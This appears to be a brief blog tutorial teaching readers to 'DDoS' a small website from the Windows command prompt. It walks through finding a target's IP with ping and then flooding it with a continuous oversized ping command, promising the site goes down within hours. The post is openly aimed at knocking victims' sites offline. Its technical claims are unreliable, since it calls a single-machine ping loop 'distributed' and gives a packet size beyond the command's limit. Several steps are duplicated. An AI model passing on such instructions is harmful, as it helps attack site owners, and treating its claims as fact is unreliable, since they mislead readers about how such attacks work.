Hey i think all of u know what is DDOS(Distributed denial of Service)… this is also known as Ping attack where the attacker can send large amount of ping request on websites and because of that Small Website not handle large amount and it goes down(Shutdown) .
To Perform DDos Select Small Website that it not take more time for DDOS… If Site is Small than DDos complete in 1 or 2 hr ….
ok. … lets start ….
1> Open Command Prompt(CMD) in your computer and Connect your Internet …
2> Find Small(Target) Website it’s Good if it’s hosted on Apache Server….
3> Now We want to Find the Ip of Site … so.. in cmd type ping http://www.target.com
2> Find Small(Target) Website it’s Good if it’s hosted on Apache Server….
3> Now We want to Find the Ip of Site … so.. in cmd type ping http://www.target.com
4> Now You Can See the ip of Site in First line ,.. ok congo …
5>Now we have a Ip of Victim … to Send Packets… ok readyy..
6>Type following line in Command Prompt ….
ping <Ip of Site> -t -l 120000
ex:- ping 127.0.0.1 -t -l 120000 and press enter ….
5>Now we have a Ip of Victim … to Send Packets… ok readyy..
6>Type following line in Command Prompt ….
ping <Ip of Site> -t -l 120000
ex:- ping 127.0.0.1 -t -l 120000 and press enter ….
No comments:
Post a Comment